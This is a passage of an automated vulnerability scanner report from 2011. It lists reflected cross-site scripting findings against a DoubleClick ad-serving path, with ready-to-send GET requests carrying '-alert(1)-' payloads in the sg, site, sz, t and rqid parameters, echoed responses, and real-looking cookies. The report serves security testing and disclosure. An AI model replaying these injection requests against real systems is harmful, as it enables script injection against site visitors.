Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:30 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54539

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D710e91'-alert(1)-'f91892f526a&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/http://www.blackberry.com">
...[SNIP]...

3.157. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [rqid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the rqid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bae93"-alert(1)-"c1a656bef97 was submitted in the rqid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7bae93"-alert(1)-"c1a656bef97&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:19:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54539

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7bae93"-alert(1)-"c1a656bef97&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/";
this.clickN = "0";

...[SNIP]...

3.158. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [sg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2aa53'-alert(1)-'20a1eda3f6c was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=5025622aa53'-alert(1)-'20a1eda3f6c&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:27 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
t/click%3Bh%3Dv8/3af6/17/182/%2a/b%3B238347919%3B0-0%3B0%3B61499020%3B4307-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=5025622aa53'-alert(1)-'20a1eda3f6c&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom
...[SNIP]...

3.159. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [sg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the sg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 41489"-alert(1)-"2cc112ad18b was submitted in the sg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=50256241489"-alert(1)-"2cc112ad18b&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:23 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
t/click%3Bh%3Dv8/3af6/17/182/%2a/b%3B238347919%3B0-0%3B0%3B61499020%3B4307-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=50256241489"-alert(1)-"2cc112ad18b&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom
...[SNIP]...

3.160. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59eb9'-alert(1)-'a7fc128b15f was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=359eb9'-alert(1)-'a7fc128b15f&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:52 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
07-300/250%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=359eb9'-alert(1)-'a7fc128b15f&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5N
...[SNIP]...

3.161. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [site parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the site request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 56db1"-alert(1)-"f50fc3f5031 was submitted in the site parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=356db1"-alert(1)-"f50fc3f5031&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:17:49 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
07-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=356db1"-alert(1)-"f50fc3f5031&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5N
...[SNIP]...

3.162. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5af5b"-alert(1)-"d6186458506 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=193815af5b"-alert(1)-"d6186458506&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
leclick.net/click%3Bh%3Dv8/3af6/17/182/%2a/j%3B238347919%3B1-0%3B0%3B61499020%3B4307-300/250%3B41885699/41903486/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=193815af5b"-alert(1)-"d6186458506&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppar
...[SNIP]...

3.163. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [sz parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3311b'-alert(1)-'99299d172eb was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=193813311b'-alert(1)-'99299d172eb&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.45&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:16:13 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54548

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
leclick.net/click%3Bh%3Dv8/3af6/17/182/%2a/b%3B238347919%3B0-0%3B0%3B61499020%3B4307-300/250%3B41885690/41903477/1%3B%3B%7Eokv%3D%3Bpc%3Dcbs502562%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=193813311b'-alert(1)-'99299d172eb&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppar
...[SNIP]...

3.164. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 49200"-alert(1)-"2b903183c61 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.4549200"-alert(1)-"2b903183c61&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:06 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.4549200"-alert(1)-"2b903183c61&event=58/";
this.clickN = "0";
this.type = type;
this.uniqueId = plcrInfo_1303848426617.uniqueId;
this.thirdPartyImpUrl = "";

...[SNIP]...

3.165. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5345600.23 [t parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5345600.23

Issue detail

The value of the t request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2600b'-alert(1)-'a9e12c1e8f3 was submitted in the t parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5739.cnet.comOX2308/B5345600.23;sz=300x250;pc=cbs502562;click0=http://adlog.com.com/adlog/e/r=19381&sg=502562&o=10784%253a30686%253aB266%253a9728416%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=30686&pid=&cid=20057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.452600b'-alert(1)-'a9e12c1e8f3&event=58/;ord=2011.04.27.23.14.45? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://news.cnet.com/8301-30686_3-20057815-266.html?tag=topStories1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|1676624/553458/15090,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u; L20=1.1303929977257

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Wed, 27 Apr 2011 23:22:10 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 54545

<html><head><title>Advertisement</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><SCRIPT language="JavaScript">
if(typeof(dartCallbackObjects) == "undefined")
...[SNIP]...
057815&pp=100&e=3&rqid=01phx1-ad-e19:4DB8789F2F30D7&orh=cnet.com&oepartner=&epartner=&ppartner=&pdom=news.cnet.com&cpnmodule=&count=&ra=173.193.214.243&pg=mzakjAoOYJQAAEv5NtAAAAIY&t=2011.04.27.23.14.452600b'-alert(1)-'a9e12c1e8f3&event=58/http://www.blackberry.com">
...[SNIP]...

3.166. http://ad.doubleclick.net/adi/N5739.cnet.comOX2308/B5374276.15 [b parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adi/N5739.cnet.comOX2308/B5374276.15

Issue detail

